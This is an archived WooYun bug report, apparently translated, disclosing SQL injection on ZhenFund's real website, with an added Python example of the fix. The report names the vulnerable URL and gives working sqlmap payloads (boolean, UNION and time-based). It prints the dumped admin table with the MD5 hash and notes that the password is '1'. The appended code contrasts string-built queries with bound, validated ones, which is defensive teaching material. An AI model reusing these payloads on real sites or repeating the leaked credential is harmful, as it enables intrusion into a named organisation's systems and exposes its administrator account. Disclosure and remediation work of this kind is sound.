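Bug ID: WooYun-2015-0127853
Title: SQL injection in ZhenFund (真格基金)
Vendor: ZhenFund (真格基金)
Author: 路人甲
Submitted: 2015-07-20 18:47
Disclosed: 2015-09-03 18:48
Type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: Unable to contact the vendor, or the vendor actively ignored the report
Tags:
2015-07-20: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2015-09-03: The vendor has actively ignored the vulnerability; details disclosed to the public
Is this the ZhenFund from the summit roundtable? Come and claim this one.
ZhenFund main site injection: http://www.zhenfund.com/Home/Index/category/id/4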
```
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452
Type: UNION query
Title: MySQL UNION query (NULL) - 14 columns
Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248
---
[13:46:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11
[13:46:07] [INFO] fetching current user
current user: '[email protected]'
```
```
Database: lfm_zgjj
Table: zgjj_admin
[1 entry]
+---------+--------------+------+---------+----------+----------------------------------+------------+
| adminId | createUserId | role | useFlag | username | password                         | createTime |
+---------+--------------+------+---------+----------+----------------------------------+------------+
| 1       | 1            | 4    | 1       | admin    | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |
+---------+--------------+------+---------+----------+----------------------------------+------------+
```
The password is actually just 1.
Filter the input, and check for other instances.
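One way to apply that fix, as an added example (not code from the report or from the affected site): the `id` path segment is validated as an integer and then bound as a query parameter. It assumes the segment lands inside a parenthesised condition, which the `)` … `(` wrapping of the sqlmap payloads suggests; the table, rows and function names are constructed, and SQLite stands in for MySQL so the block runs offline.

```python
import re
import sqlite3

# Boolean-based test string from the report above (the part after /id/).
PAGE_PAYLOAD = "4) AND 1240=1240 AND (9452=9452"

def make_db():
    # Constructed table and rows; the site's real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER PRIMARY KEY,"
               " category_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO article (category_id, title) VALUES (?, ?)",
                   [(4, "news-a"), (4, "news-b"), (5, "other")])
    return db

def category_vulnerable(db, raw_id):
    # "Before": the path segment is concatenated inside a parenthesised
    # condition, so a ")" in the segment closes it and the rest runs as SQL.
    sql = ("SELECT title FROM article WHERE (category_id = "
           + raw_id + ") ORDER BY id")
    return [row[0] for row in db.execute(sql)]

def category_bound(db, raw_id):
    # Placeholder only: the segment is compared as a value, never parsed as SQL.
    sql = "SELECT title FROM article WHERE (category_id = ?) ORDER BY id"
    return [row[0] for row in db.execute(sql, (raw_id,))]

def parse_category_id(raw_id):
    # Allow-list: 1-9 ASCII digits. Anything else is rejected before the query.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("invalid category id")
    return int(raw_id)

def category_hardened(db, raw_id):
    # Validate the type first, then bind the integer as a parameter.
    return category_bound(db, parse_category_id(raw_id))

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", category_vulnerable(db, PAGE_PAYLOAD))
    print("bound only:", category_bound(db, PAGE_PAYLOAD))
    try:
        category_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened:  rejected,", exc)
    print("hardened, id=4:", category_hardened(db, "4"))
```

The concatenated query accepts the test string and returns the category 4 rows, which is the behaviour the boolean-based check keys on; the bound query matches nothing, and the validated path never reaches the database.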
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)